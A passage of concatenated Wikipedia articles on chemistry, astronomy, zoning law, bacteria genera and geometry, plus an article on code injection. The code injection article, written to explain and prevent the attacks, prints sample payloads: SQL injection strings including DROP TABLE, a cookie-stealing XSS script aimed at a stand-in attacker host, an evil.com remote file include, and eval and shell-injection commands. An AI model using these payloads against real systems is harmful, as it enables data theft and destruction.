was found that stress granule formation was inhibited in the presence of gephyronic acid. Gephyronic acid may have a direct or indirect effect on the translation initiation factor eIF2α, which would trap mRNA in nonfunctional initiation complexes, inhibiting both P-body and stress granule formation. Biosynthesis Sequencing of the PKS gene cluster in C. violaceus revealed five type I polyketide synthases and post-PKS tailoring enzymes, including an O-methyltransferase and a cytochrome P450 monooxygenase. The overall structure correlates well with the modular arrangement of the PKS-encoded proteins, aside from some unexpected elements that are likely caused by inactive domains. Initial loading uses a GCN5-related N-acetyltransferase (GNAT) domain instead of the typical AT domain. Gephyronic acid contains a methyl ether at C-5 and a C-12/C-13 epoxide. These functional groups are incorporated by post-PKS tailoring enzymes. GphA is likely responsible for installation of the C-5 methyl ether. The O-methyltransferases SpiB and SpiK used in spirangien biosynthesis exhibit the same SAM-binding motif as GphA. GphK is a member of the cytochrome P450 superfamily and is suspected to carry out the epoxidation of the C12-C13 olefin.
Such epoxidation in post-PKS modifications has been seen in epothilone biosynthesis by EpoK. In EpoK, the consensus mechanism of epoxidation by P450 involves the formation of a pi-complex between an oxoferryl pi-cation radical species (FeIV) and the olefin pi bond, followed by electron transfer, formation of the olefin pi-cation radical, and finally epoxidation. However, it is also possible that, in addition to the cytochrome P450, a FAD-dependent monooxygenase is required to install the epoxide. Such a codependent process is seen in tirandamycin biosynthesis by TamL. Experiments to clarify the function of these enzymes in gephyronic acid biosynthesis are underway. References Polyketides Epoxides
Gephyronic acid
Chemistry
980
63,627,383
https://en.wikipedia.org/wiki/NGC%201347
NGC 1347 is a barred spiral galaxy situated in the constellation of Eridanus. It is at a distance of 81 million light years and is a member of the Eridanus cluster, a cluster of about 200 galaxies. NGC 1347 has a Hubble classification of SBc, which indicates it is a barred spiral galaxy. It is moving away from the Milky Way at a rate of 1,760 km/s. Its apparent size on the night sky is 1.5' x 1.3', which at that distance corresponds to a real size of about 35,000 ly. NGC 1347 forms a pair, named Arp 39, with the galaxy PGC 816443. References Eridanus (constellation) Barred spiral galaxies 1347 039 012989 Eridanus Group
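As a worked check (an editor's addition, not from the article), the quoted physical size follows from the distance and the larger angular dimension via the small-angle approximation.

import math

distance_ly = 81e6                  # 81 million light-years
theta = math.radians(1.5 / 60)      # 1.5 arcminutes, converted to radians
print(distance_ly * theta)          # ~3.5e4, i.e. about 35,000 light-years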
NGC 1347
Astronomy
159
45,178,493
https://en.wikipedia.org/wiki/Helvella%20albella
Helvella albella is a species of fungus in the family Helvellaceae that is found in Europe and North America. It was described by French mycologist Lucien Quélet in 1896. References albella Fungi described in 1896 Fungi of Europe Fungi of North America Fungus species
Helvella albella
Biology
60
63,992,022
https://en.wikipedia.org/wiki/Phoslactomycin%20B
Phoslactomycin (PLM) is a natural product isolated from Streptomyces species. It is an inhibitor of the serine/threonine protein phosphatase known as protein phosphatase 2A (PP2A). PP2A is involved in the cell's growth-factor signalling, including the formation of mitogen-activated protein interactions, and plays a role in cell division and signal transduction. PLM is therefore of interest as a drug candidate against tumors, cancer, and bacteria. Seven different PLMs, PLM A to PLM G, are currently known; they differ in the post-synthesis modifications that follow the core biosynthesis of PLM. Phoslactomycin B (PLM B) is the direct product of the PLM biosynthetic pathway and the intermediate from which the other PLMs are produced. The biosynthesis of phoslactomycin is carried out by a type I polyketide synthase (PKS). Such polyketides are characterized by a macrocyclic lactone and are produced by bacteria and fungi. Many articles have described the synthesis of the different PLMs A through G starting from PLM B. Polyketide synthase domains The domains in a type I polyketide synthase are: ACP: acyl carrier protein (serves as chaperone) AT: acyl transferase (transfers the acyl group from CoA to the ACP) KS: keto synthase (forms the new carbon-carbon bond) KR: keto reductase (NADPH-dependent; reduces the beta-ketone to a beta-hydroxyl) DH: dehydratase (eliminates the beta-OH to give alpha/beta-unsaturation) ER: enoyl reductase (NADPH-dependent; reduces alpha/beta-unsaturation) TE: thioesterase (hydrolyses / cyclizes) Biosynthesis pathway of phoslactomycin The phoslactomycin PKS has one loading domain and 7 modules, encoded by the six proteins PnA, PnB, PnC, PnD, PnE, and PnF. Biosynthesis starts with the loading of cyclohexyl-CoA. In each module, a keto synthase (KS) creates a new carbon-carbon linkage to elongate the chain, and an acyl transferase (AT) transfers the acyl group to the ACP domain. The ACP then carries the acyl chain into the subsequent reactions, and each module ends with a keto reductase that reduces the ketone to a more stable hydroxyl group. Module 1 uses the precursor malonyl-CoA and a dehydratase domain to create a double bond. Similarly, module 2, module 5, and module 7 have the same 5 domains, KS-AT-ACP-DH-KR, but module 7 carries one additional domain at the end, a thioesterase (TE), which closes the ring of the phoslactomycin product. Module 4 and module 6 have 4 domains, KS-AT-ACP-KR, and use the precursor ethylmalonyl-CoA. The final product is phoslactomycin. Phoslactomycin family PLM is obtained by isolation from Streptomyces platensis. The genes PnT1 and PnT2 regulate the post-synthesis processing of PLM to form PLM B through phosphorylation and addition of the amine group. A biosynthetic analysis published in the journal Gene indicated that PLM B is used to produce PLM A as well as PLMs C-F. PLMs A-F are post-synthesis products of PLM biosynthesis, generated through modification by the enzymes PnT1-T8. PLMs regulate the actin cytoskeleton by indirectly inducing actin depolymerization. In experiments, PLM F did not affect the polymerization of purified actin in vitro; however, it enhanced the phosphorylation of intracellular vimentin. Footnotes Phosphatase inhibitors Natural products
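As an illustrative aside (an editor's toy sketch of general type I PKS logic, not a simulation of the actual Pn proteins), the module descriptions above follow a standard rule of thumb: the reductive domains present in a module determine how far the beta-ketone formed by the KS domain is processed.

def beta_carbon_state(domains):
    # KR alone leaves a beta-hydroxyl; KR + DH give an alpha/beta double bond;
    # KR + DH + ER fully reduce; with none of them, the beta-ketone remains.
    if {"KR", "DH", "ER"} <= domains:
        return "fully reduced methylene"
    if {"KR", "DH"} <= domains:
        return "alpha/beta double bond"
    if "KR" in domains:
        return "beta-hydroxyl"
    return "beta-ketone"

# Domain sets as described for the phoslactomycin PKS above
print(beta_carbon_state({"KS", "AT", "ACP", "DH", "KR"}))  # modules 1, 2, 5, 7
print(beta_carbon_state({"KS", "AT", "ACP", "KR"}))        # modules 4, 6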
Phoslactomycin B
Chemistry
907
1,571,487
https://en.wikipedia.org/wiki/HD%20114729
HD 114729 is a Sun-like star with an orbiting exoplanet in the southern constellation of Centaurus. Based on parallax measurements, it is located at a distance of 124 light years from the Sun. It is near the lower limit of visibility to the naked eye, having an apparent visual magnitude of 6.68. The system is drifting further away with a heliocentric radial velocity of 26.3 km/s, and it has a relatively high proper motion across the celestial sphere. The spectrum of HD 114729 presents as an ordinary G-type main-sequence star, a yellow dwarf, with a stellar classification of G0 V. It has a negligible level of magnetic activity, making it chromospherically quiet. The star has about the same mass as the Sun, but its radius is 44% greater than the Sun's. It is radiating more than double the luminosity of the Sun from its photosphere at an effective temperature of 5,939 K. The size and luminosity suggest a much greater age than the Sun; perhaps around nine billion years. HD 114729 has a co-moving companion designated HD 114729 B, with the latter having 25.3% of the Sun's mass. Planetary system In 2003 the California and Carnegie Planet Search team announced the discovery of a planet orbiting the star. This planet orbits twice as far from its star as Earth does from the Sun, on a very eccentric orbit. It has a minimum mass of 84% (0.840) that of Jupiter, and thus at least 267 times the mass of Earth. See also List of extrasolar planets References External links G-type main-sequence stars Planetary systems with one confirmed planet Centaurus Durchmusterung objects 114729 064459
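Two of the figures above can be checked with standard conversion factors (317.8 Earth masses per Jupiter mass, 3.2616 light-years per parsec); this worked arithmetic is an editor's addition, not from the article.

M_JUP_IN_EARTH = 317.8
LY_PER_PARSEC = 3.2616

print(0.840 * M_JUP_IN_EARTH)    # ~267 Earth masses, the quoted minimum planet mass
d_pc = 124 / LY_PER_PARSEC       # 124 light-years is about 38 parsecs
print(1000 / d_pc)               # implied parallax: ~26 milliarcseconds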
HD 114729
Astronomy
388
22,556,798
https://en.wikipedia.org/wiki/PAC611
Socket PAC611 is a 611 pin microprocessor socket designed to interface an Intel Itanium 2 processor to the rest of the computer (usually via the motherboard). It provides both an electrical interface as well as physical support. This socket is designed to support a microprocessor module. Technical specifications Socket PAC611 was introduced with Intel's second generation Itanium in 2002. It supported bus speeds up to 200 MHz double-pumped. Socket PAC611 processors reach speeds up to 1.66 GHz. See also List of Intel microprocessors References Socket 604
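For scale, the peak bus bandwidth implied by those figures can be estimated as below; the 128-bit (16-byte) data-bus width is an assumption about the Itanium 2 front-side bus and is not stated in the article.

transfers_per_second = 200e6 * 2   # 200 MHz, double-pumped -> 400 MT/s
bus_width_bytes = 16               # assumed 128-bit data bus
print(transfers_per_second * bus_width_bytes / 1e9)   # 6.4 GB/s peak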
PAC611
Technology
125
13,802,176
https://en.wikipedia.org/wiki/Spot%20zoning
Spot zoning is the application of zoning to a specific parcel or parcels of land within a larger zoned area where the rezoning is at odds with a city's master plan and current zoning restrictions. Spot zoning may be ruled invalid as an "arbitrary, capricious and unreasonable treatment" of a limited parcel of land by a local zoning ordinance. While zoning regulates the land use in whole districts, spot zoning makes unjustified exceptions for a parcel or parcels within a district. The small size of the parcel is not the sole defining characteristic of a spot zone. Rather, the defining characteristic is the narrowness and unjustified nature of the benefit to the particular property owner, to the detriment of a general land use plan or public goals. The rezoning may provide unjustified special treatment that benefits a particular owner, while undermining the pre-existing rights and uses of adjacent property owners. This would be called an instance of spot zoning. On the other hand, a change in zoning for a small land area may not be a spot zone if it is consistent with, and furthers the purposes of, the general area plan. For example, a small zone allowing limited commercial uses such as a corner store within a residential area may not be a spot zone, but a carve-out for an industrial use or a night club might be considered a case of spot zoning. In the first case, the differing land uses are mutually compatible and supportive. In the latter case, the residential nature of the area would be harmed by a conflicting land use. When the change in zoning does not advance a general public purpose in land use, courts may rule certain instances of spot zoning as illegal. The Standard State Zoning Enabling Act states "all such regulations shall be uniform for each class or kind of building throughout each district." It may also be an invalid exercise of authority, if spot zoning is not a right conferred upon the body by the state's zoning enabling statute, because it deviates from the plan set out by the enabling statute. Special zoning treatment may have a legitimate use, however, such as when a community wishes to have more local control of land use. This may occur in a rural county which has no zoning at all, where a village or hamlet may wish to maintain its characteristic feel and historic appeal (often to protect tourism), without adding another layer of local government and taxes by creating a municipality. The county designates the boundaries (often those of an existing census-designated place) and maintains regulations through the county commission instead of a separate town council. Authority Generally, zoning is a constitutional exercise of a state's police power to protect public health, safety, and welfare. Therefore, spot zoning (or any zoning enactment) would be unconstitutional to the extent that it contradicts or fails to advance a legitimate public purpose, such as promotion of community welfare or protection of other properties. Spot zoning would be a constitutional exercise of zoning power by a local zoning authority if the state zoning enabling law allows spot zoning. Conversely, spot zoning may be an invalid exercise of a local authority's zoning power if the state zoning enabling law prohibits spot zoning. Situations where spot zoning may arise Variance A variance is the license to deviate from the land-use restrictions imposed by the zoning ordinance. A variance usually requires that the landowner suffer a substantial hardship which only the granting of a variance may remedy.
If a local zoning authority decides to grant a variance to a landowner who lacks substantial hardship, then its legality (regarding equal protection) may be called into question. Special-use permit A special-use permit occurs when a zoning ordinance allows some specific exception to its regulations provided that a landowner receives a special-use permit from the local zoning authority. An example of such an exception is a church in a residential neighborhood. If the special-use permit deviates from the zoning ordinance or the enabling statute, then an instance of spot zoning arises. Amendment to ordinance A local zoning authority like a city may seek to amend its zoning ordinance. If it amends its zoning ordinance but only for a parcel within a district, and the parcel has a different land use characterization than the surrounding district, then an instance of spot zoning arises. Contract zoning Contract zoning occurs when a local zoning authority accommodates a private interest by rezoning a district or a parcel of land within that district. The private interest may then be allowed to develop the land where the zoning regulations previously prohibited such a land use. Contract zoning is usually illegal, in contrast with permissible conditional use (also known as special use) zoning. See also Bill of attainder Zoning References External links North Carolina, different approach Real estate in the United States Real property law Zoning
Spot zoning
Engineering
953
1,060,909
https://en.wikipedia.org/wiki/Residual%20strength
Residual strength is the load or force (usually mechanical) that a damaged object or material can still carry without failing. Material toughness, together with the size, geometry, and orientation of the fracture, all contribute to residual strength. References Materials science
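One standard fracture-mechanics way to quantify this (a textbook sketch, not taken from the article) treats the residual strength as the stress at which the stress intensity factor K = Y * sigma * sqrt(pi * a) reaches the material's fracture toughness K_Ic; all numbers below are hypothetical.

import math

def residual_strength(k_ic, crack_length, geometry_factor=1.0):
    # sigma_c = K_Ic / (Y * sqrt(pi * a)); with K_Ic in MPa*sqrt(m) and the
    # crack length a in metres, the result is in MPa.
    return k_ic / (geometry_factor * math.sqrt(math.pi * crack_length))

# Hypothetical aluminium-alloy values: K_Ic = 24 MPa*sqrt(m), 2 mm edge crack
print(residual_strength(24.0, 0.002, geometry_factor=1.12))  # ~270 MPa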
Residual strength
Physics,Materials_science,Engineering
47
44,605,851
https://en.wikipedia.org/wiki/Gynomorph
Gynomorph is a word used to describe an organism with female physical characteristics. Mythology In Greek mythology and religion, a gynomorph was a bi-gendered god with both masculine and feminine characteristics. Gynomorphs were portrayed as effeminate young males, like Dionysos, a masculine god who possessed distinctly feminine features. Gynomorphs retained the creative capacity of female divinities: they had cosmic wombs, but they also possessed the inseminating abilities attributed to male divinities. Biology In biology, a gynomorph is an organism with female physical characteristics, whereas an andromorph is an organism with male physical characteristics. For instance, some female damselflies show colour variations typically found in males. Andromorphs, by resembling males, are thought to benefit from avoiding male harassment. Some authors have proposed that this benefit is offset by a higher probability of detection for andromorphs compared to gynomorphs owing to differences in body colouration. See also Androgyny Futanari Gynandromorphism Hermaphrodite Sexual dimorphism Shemale References Androgynous and hermaphroditic deities Female Sexual selection LGBTQ themes in Greek mythology
Gynomorph
Biology
264
1,065,470
https://en.wikipedia.org/wiki/Code%20injection
Code injection is a computer security exploit where a program fails to correctly process external data, such as user input, causing it to interpret the data as executable commands. An attacker using this method "injects" code into the program while it is running. Successful exploitation of a code injection vulnerability can result in data breaches, access to restricted or critical computer systems, and the spread of malware. Code injection vulnerabilities occur when an application sends untrusted data to an interpreter, which then executes the injected text as code. Injection flaws are often found in services like Structured Query Language (SQL) databases, Extensible Markup Language (XML) parsers, operating system commands, Simple Mail Transfer Protocol (SMTP) headers, and other program arguments. Injection flaws can be identified through source code examination, static analysis, or dynamic testing methods such as fuzzing. There are numerous types of code injection vulnerabilities, but most are errors in interpretation—they treat benign user input as code or fail to distinguish input from system commands. Many examples of interpretation errors can exist outside of computer science, such as the comedy routine "Who's on First?". Code injection can be used maliciously for many purposes, including: Arbitrarily modifying values in a database through SQL injection; the impact of this can range from website defacement to serious compromise of sensitive data. For more information, see Arbitrary code execution. Installing malware or executing malevolent code on a server by injecting server scripting code (such as PHP). Privilege escalation to either superuser permissions on UNIX by exploiting shell injection vulnerabilities in a binary file or to Local System privileges on Microsoft Windows by exploiting a service within Windows. Attacking web users with Hyper Text Markup Language (HTML) or Cross-Site Scripting (XSS) injection. Code injections that target the Internet of Things could also lead to severe consequences such as data breaches and service disruption. Code injection can occur in any type of program that runs with an interpreter. Performing such an injection is often trivial, which is one of the primary reasons why server software is kept isolated from users. Code injection can be observed first-hand by using a browser's developer tools. Code injection vulnerabilities are recorded by the National Institute of Standards and Technology (NIST) in the National Vulnerability Database (NVD) as CWE-94. Code injection peaked in 2008 at 5.66% as a percentage of all recorded vulnerabilities. Benign and unintentional use Code injection may be done with good intentions. For example, changing or tweaking the behavior of a program or system through code injection can cause the system to behave in a certain way without malicious intent. Code injection could, for example: Introduce a useful new column that did not appear in the original design of a search results page. Offer a new way to filter, order, or group data by using a field not exposed in the default functions of the original design. Add functionality like connecting to online resources in an offline program. Override a function, making calls redirect to another implementation. This can be done with the dynamic linker in Linux. Some users may unsuspectingly perform code injection because the input they provided to a program was not considered by those who originally developed the system.
For example:
What the user considers valid input may contain token characters or strings that the developer has reserved for special meaning (such as the ampersand or quotation marks).
The user may submit a malformed file as input that is handled properly in one application but is toxic to the receiving system.

Another benign use of code injection is the discovery of injection flaws in order to find and fix vulnerabilities. This is known as penetration testing.

Preventing code injection
To prevent code injection problems, developers can use secure input- and output-handling strategies, such as:
Using an application programming interface (API) that, if used properly, is secure against all input characters. Parameterized queries move user data out of the string that is interpreted as a command. Additionally, the Criteria API and similar APIs move away from the concept of command strings to be created and interpreted.
Enforcing language separation via a static type system.
Validating or "sanitizing" input, such as whitelisting known good values. This can be done on the client side, which is prone to modification by malicious users, or on the server side, which is more secure.
Encoding input or escaping dangerous characters. For instance, in PHP, the htmlspecialchars() function escapes special characters for safe output of text in HTML, and the mysqli::real_escape_string() function isolates data that will be included in an SQL request, protecting against SQL injection.
Encoding output, which can be used to prevent XSS attacks against website visitors.
Using the HttpOnly flag for HTTP cookies. When this flag is set, client-side script cannot interact with cookies, which prevents certain XSS attacks.
Modular shell disassociation from the kernel.

Regarding SQL injection specifically, one can use parameterized queries, stored procedures, whitelist input validation, and other approaches to mitigate the risk of an attack. Using object-relational mapping can further help prevent users from directly manipulating SQL queries.

The solutions described above deal primarily with web-based injection of HTML or script code into a server-side application. Other approaches must be taken, however, when dealing with injection of user code on a user-operated machine, which often results in privilege-elevation attacks. Some approaches used to detect and isolate managed and unmanaged code injection are:
Runtime image hash validation: capturing the hash of a partial or complete image of the executable loaded into memory and comparing it with stored, expected hashes.
NX bit: all user data is stored in special memory sections that are marked as non-executable. The processor is made aware that no code exists in that part of memory and refuses to execute anything found there.
Canaries: randomly chosen values placed on the stack. At runtime, a canary is checked when a function returns; if it has been modified, the program stops execution and exits. This occurs on a failed stack-overflow attack.
Code Pointer Masking (CPM): after a (potentially changed) code pointer is loaded into a register, a bitmask is applied to it, effectively restricting the addresses to which the pointer can refer. This has been used in the C programming language.

Examples

SQL injection
An SQL injection takes advantage of SQL syntax to inject malicious commands that can read or modify a database or compromise the meaning of the original query.

For example, consider a web page that has two text fields which allow users to enter a username and a password. The code behind the page generates an SQL query to check the password against the list of user names:

SELECT UserList.Username FROM UserList WHERE UserList.Username = 'Username' AND UserList.Password = 'Password'

If this query returns any rows, then access is granted. However, if the malicious user enters a valid Username and injects valid code ('Password' OR '1'='1') in the Password field, then the resulting query looks like this:

SELECT UserList.Username FROM UserList WHERE UserList.Username = 'Username' AND UserList.Password = 'Password' OR '1'='1'

In the example above, "Password" is assumed to be blank or some innocuous string. '1'='1' is always true, so many rows are returned, thereby allowing access.

The technique may be refined to allow multiple statements to run, or even to load and run external programs. Assume a query with the following format:

SELECT User.UserID FROM User WHERE User.UserID = '" + UserID + "' AND User.Pwd = '" + Password + "'

If an adversary supplies the following inputs:

UserID: ';DROP TABLE User; --'
Password: 'OR"='

then the query will be parsed as:

SELECT User.UserID FROM User WHERE User.UserID = '';DROP TABLE User; --' AND Pwd = ''OR"='

and the User table will be removed from the database. This occurs because the ; symbol signifies the end of one command and the start of a new one, while -- signifies the start of a comment.
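The login check above can be hardened with a parameterized (prepared) query, one way of applying the API-based advice from the prevention list. The following PHP sketch is illustrative rather than part of the original example: it assumes an existing mysqli connection in $db and reuses the UserList table and column names from above.

<?php
// $username and $password hold the raw, untrusted form input.
// The SQL structure is fixed at prepare() time; the ? placeholders
// can only ever be filled with data, never with additional SQL.
$stmt = $db->prepare(
    'SELECT Username FROM UserList WHERE Username = ? AND Password = ?'
);
$stmt->bind_param('ss', $username, $password); // "ss" = two string values
$stmt->execute();
$stmt->store_result();
if ($stmt->num_rows > 0) {
    // Credentials matched; grant access.
}

With this structure, input such as ' OR '1'='1 is compared literally against the stored password, so the injection shown above fails. (In practice, passwords should also be stored hashed rather than compared as plain text; the sketch mirrors the example above only for clarity.)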
Cross-site scripting
Cross-site scripting involves the malicious injection or introduction of code into an application. For example, some web servers have a guestbook script, which accepts small messages from users and typically receives messages such as:

Very nice site!

However, a malicious person may know of a code injection vulnerability in the guestbook and enter a message such as:

Nice site, I think I'll take it. <script>window.location="https://some_attacker/evilcgi/cookie.cgi?steal=" + escape(document.cookie)</script>

If another user then views the page, the injected code is executed. This code can allow the attacker to impersonate another user. However, the same software bug can be triggered accidentally by an unassuming user, causing the website to display broken HTML.

HTML and script injection is a popular subject, commonly termed "cross-site scripting" or "XSS". XSS refers to an injection flaw whereby user input to a web script or similar component is placed into the output HTML without being checked for HTML code or scripting. Many of these problems are related to erroneous assumptions about what input data is possible, or about the effects of special data.
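A common fix for the guestbook, matching the output-encoding advice in the prevention section, is to escape the message before writing it into the page. A minimal PHP sketch; the variable $message, standing for the submitted guestbook entry, is hypothetical:

<?php
// Convert &, <, >, " and ' into HTML entities so that an embedded
// <script> tag is rendered as visible text instead of being executed.
$safe = htmlspecialchars($message, ENT_QUOTES, 'UTF-8');
echo '<p>' . $safe . '</p>';

After encoding, the attacker's payload appears on the page as the literal text <script>...</script>, and the visitor's browser never runs it.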
Server-side template injection
Template engines are often used in modern web applications to display dynamic data. However, trusting non-validated user data can frequently lead to critical vulnerabilities such as server-side template injection. While this vulnerability is similar to cross-site scripting, template injection can be leveraged to execute code on the web server rather than in a visitor's browser. It abuses a common workflow of web applications, which often use user input and templates to render a web page. The example below shows the concept: the placeholder {{visitor_name}} is replaced with data during the rendering process.

Hello {{visitor_name}}

An attacker can use this workflow to inject code into the rendering pipeline by providing a malicious visitor_name. Depending on the implementation of the web application, the attacker could choose to inject {{7*'7'}}, which the renderer could resolve to Hello 7777777. Note that the web server itself has evaluated the malicious code and therefore could be vulnerable to remote code execution.

Dynamic evaluation vulnerabilities
An eval() injection vulnerability occurs when an attacker can control all or part of an input string that is fed into an eval() function call.

$myvar = 'somevalue';
$x = $_GET['arg'];
eval('$myvar = ' . $x . ';');

The argument of eval will be processed as PHP, so additional commands can be appended. For example, if "arg" is set to 10; system('/bin/echo uh-oh'), additional code is run which executes a program on the server, in this case /bin/echo.

Object injection
PHP allows serialization and deserialization of whole objects. If untrusted input is allowed into the deserialization function, it is possible to overwrite existing classes in the program and execute malicious attacks. Such an attack on Joomla was found in 2013.

Remote file injection
Consider this PHP program, which includes a file specified by request:

<?php
$color = 'blue';
if (isset($_GET['color']))
    $color = $_GET['color'];
require($color . '.php');

The example expects a color to be provided, but an attacker might supply color=http://evil.com/exploit, causing PHP to load the remote file.
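A standard mitigation for this kind of file-inclusion bug is whitelist validation, as recommended in the prevention section: the request parameter is used only if it matches a fixed list of known pages. The sketch below is a hardened version of the example above; the list of allowed values is illustrative:

<?php
// Only values from this fixed whitelist can ever reach require().
$allowed = array('blue', 'red', 'green');

$color = 'blue'; // safe default
if (isset($_GET['color']) && in_array($_GET['color'], $allowed, true)) {
    $color = $_GET['color'];
}
require($color . '.php'); // $color is now guaranteed to be a known value

Because the attacker-controlled value is compared against the whitelist (with in_array()'s strict flag set) rather than being passed through, a request such as color=http://evil.com/exploit simply falls back to the default page.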
Format specifier injection
Format string bugs appear most commonly when a programmer wishes to print a string containing user-supplied data. The programmer may mistakenly write printf(buffer) instead of printf("%s", buffer). The first version interprets buffer as a format string and parses any formatting instructions it may contain; the second version simply prints the string to the screen, as the programmer intended. Consider the following short C program, which has a local character array password holding a password; the program asks the user for an integer and a string, then echoes out the user-provided string.

char user_input[100];
int int_in;
char password[10] = "Password1";
printf("Enter an integer\n");
scanf("%d", &int_in);
printf("Please enter a string\n");
fgets(user_input, sizeof(user_input), stdin);
printf(user_input); // Safe version is: printf("%s", user_input);
printf("\n");
return 0;

If the user input is filled with a list of format specifiers, such as %s%s%s%s%s%s%s%s, then printf() will start reading from the stack. Eventually, one of the %s format specifiers will access the address of password, which is on the stack, and print Password1 to the screen.

Shell injection
Shell injection (or command injection) is named after UNIX shells but applies to most systems that allow software to programmatically execute a command line. Here is an example of a vulnerable tcsh script:

#!/bin/tcsh
# check arg: outputs "it matches" if arg is one
if ($1 == 1) echo it matches

If the above is stored in the executable file ./check, then the shell command ./check " 1 ) evil" will attempt to execute the injected shell command evil instead of comparing the argument with the constant one. Here, the code under attack is the very code that was trying to check the parameter to defend against an attack.

Any function that can be used to compose and run a shell command is a potential vehicle for launching a shell injection attack. Among these are system(), StartProcess(), and System.Diagnostics.Process.Start(). Client-server systems, such as a web browser interacting with a web server, are potentially vulnerable to shell injection. Consider the following short PHP program, which runs on a web server and calls an external program named funnytext to replace a word the user sent with some other word:

<?php
passthru("/bin/funnytext " . $_GET['USER_INPUT']);

The passthru function in this program composes a shell command that is then executed by the web server. Since part of the composed command is taken from the URL provided by the web browser, the URL can inject malicious shell commands. Code can be injected into this program in several ways by exploiting the syntax of various shell features, for example command separators (such as ; or a newline), logical operators (&& and ||), the pipe character, and command substitution with backquotes or $( ) (this list is not exhaustive).

Some languages offer functions to properly escape or quote strings that are used to construct shell commands:
PHP: escapeshellarg() and escapeshellcmd()
Python: shlex.quote()
However, this still puts the burden on programmers to know about these functions and to remember to use them every time they run shell commands. In addition to using these functions, validating or sanitizing the user input is also recommended. A safer alternative is to use APIs that execute external programs directly rather than through a shell, which prevents the possibility of shell injection; however, these APIs tend not to support the various convenience features of shells and can be more cumbersome or verbose than concise shell syntax.

See also

References

External links
Tadeusz Pietraszek and Chris Vanden Berghe. "Defending against Injection Attacks through Context-Sensitive String Evaluation (CSSE)"
News article "Flux spreads wider": the first Trojan horse to make use of code injection to prevent detection by a firewall
The Daily WTF regularly reports real-world instances of susceptibility to code injection in software

Types of malware
Injection exploits
Machine code
Articles with example C code
Code injection
Technology
3,504
13,629,364
https://en.wikipedia.org/wiki/Small%20nucleolar%20RNA%20SNORD99
In molecular biology, small nucleolar RNA SNORD99 (also known as HBII-420) is a non-coding RNA (ncRNA) molecule which functions in the biogenesis (modification) of other small nuclear RNAs (snRNAs). This type of modifying RNA is located in the nucleolus of the eukaryotic cell, which is a major site of snRNA biogenesis. It is known as a small nucleolar RNA (snoRNA) and is also often referred to as a guide RNA. SNORD99 belongs to the C/D box class of snoRNAs, which contain the C (UGAUGA) and D (CUGA) box motifs. Most members of the box C/D family function in directing site-specific 2'-O-methylation of substrate RNAs. SNORD99 is predicted to guide the 2'-O-ribose methylation of 28S ribosomal RNA at residue A2774. In the human genome this snoRNA shares the same host gene with the three H/ACA box snoRNAs ACA16, ACA44 and ACA61. References External links Non-coding RNA
Small nucleolar RNA SNORD99
Chemistry
254
42,620,834
https://en.wikipedia.org/wiki/FooDB
FooDB (The Food Database) is a freely available, open-access database containing chemical (micronutrient and macronutrient) composition data on common, unprocessed foods. It also contains extensive data on flavour and aroma constituents and food additives, as well as positive and negative health effects associated with food constituents. The database contains information on more than 28,000 chemicals found in more than 1,000 raw or unprocessed food products. The data in FooDB was collected from many sources, including textbooks, scientific journals, on-line food composition or nutrient databases, flavour and aroma databases, and various on-line metabolomic databases. This literature-derived information has been combined with experimentally derived data measured on thousands of compounds from more than 40 very common food products through the Alberta Food Metabolome Project, which is led by David S. Wishart. Users are able to browse through the FooDB data by food source, name, descriptors or function. Chemical structures and molecular weights for compounds in FooDB may be searched via a specialized chemical structure search utility. Users are able to view the content of FooDB using two different viewing options: FoodView, which lists foods by their chemical compounds, or ChemView, which lists chemicals by their food sources. Knowledge about the precise chemical composition of foods can be used to guide public health policies, assist food companies with improved food labelling, help dieticians prepare better dietary plans, support nutraceutical companies with their submissions of health claims, and guide consumer choices with regard to food purchases. See also Human Metabolome Database DrugBank Food Food composition data Food composition databases References External links Foodb website Food databases
FooDB
Chemistry
344
16,110,878
https://en.wikipedia.org/wiki/List%20of%20bacteria%20genera
This article lists the genera of the bacteria. The currently accepted taxonomy is based on the List of Prokaryotic names with Standing in Nomenclature (LPSN) and the National Center for Biotechnology Information (NCBI). However, many taxonomic names are taken from the GTDB release 08-RS214 (28 April 2023).

Phyla

List

Notes: clades that still need to be added:
Actinomycetota > Actinomycetia > Actinobacteridae
Bacillota A > Clostridiia > "Lachnospirales" > Oscillospiraceae, Ruminococcaceae
Bacteroidota > Bacteroidia
Cyanobacteriota > Cyanobacteria
Pseudomonadota (Proteobacteria s.s.) > "Caulobacteria", "Pseudomonadia"

See also
Branching order of bacterial phyla (Woese, 1987)
Branching order of bacterial phyla (Gupta, 2001)
Branching order of bacterial phyla (Cavalier-Smith, 2002)
Branching order of bacterial phyla (Rappe and Giovanoni, 2003)
Branching order of bacterial phyla (Battistuzzi et al., 2004)
Branching order of bacterial phyla (Ciccarelli et al., 2006)
Branching order of bacterial phyla after ARB Silva Living Tree
Branching order of bacterial phyla (Genome Taxonomy Database, 2018)
Bacterial phyla
List of Archaea genera
List of bacterial orders
LPSN, list of accepted bacterial and archaeal names
Human microbiome project
Microorganism
Phyla

References

External links
List of Bacteria genera

Lists of bacteria
List of bacteria genera
Biology
343
33,731,592
https://en.wikipedia.org/wiki/Playfair%27s%20axiom
In geometry, Playfair's axiom is an axiom that can be used instead of the fifth postulate of Euclid (the parallel postulate):

In a plane, given a line and a point not on it, at most one line parallel to the given line can be drawn through the point.

It is equivalent to Euclid's parallel postulate in the context of Euclidean geometry and was named after the Scottish mathematician John Playfair. The "at most" clause is all that is needed, since it can be proved from the first four axioms that at least one parallel line exists, given a line L and a point P not on L, as follows:
Construct a perpendicular: using the axioms and previously established theorems, one can construct a line perpendicular to L that passes through P.
Construct another perpendicular: a second perpendicular line is drawn to the first one, through the point P.
Parallel line: this second perpendicular is parallel to L by the definition of parallel lines (i.e. the alternate interior angles are congruent, as per the fourth axiom).

The statement is often written with the phrase "there is one and only one parallel". In Euclid's Elements, two lines are said to be parallel if they never meet; other characterizations of parallel lines are not used.

This axiom is used not only in Euclidean geometry but also in the broader study of affine geometry, where the concept of parallelism is central. In the affine geometry setting, the stronger form of Playfair's axiom (where "at most one" is replaced by "one and only one") is needed, since the axioms of neutral geometry are not present to provide a proof of existence. Playfair's version of the axiom has become so popular that it is often referred to as Euclid's parallel axiom, even though it was not Euclid's version.

History
Proclus (410–485 A.D.) clearly makes the statement in his commentary on Euclid I.31 (Book I, Proposition 31). In 1785 William Ludlam expressed the parallel axiom as follows:

Two straight lines, meeting at a point, are not both parallel to a third line.

This brief expression of Euclidean parallelism was adopted by Playfair in his textbook Elements of Geometry (1795), which was republished often. He wrote:

Two straight lines which intersect one another cannot be both parallel to the same straight line.

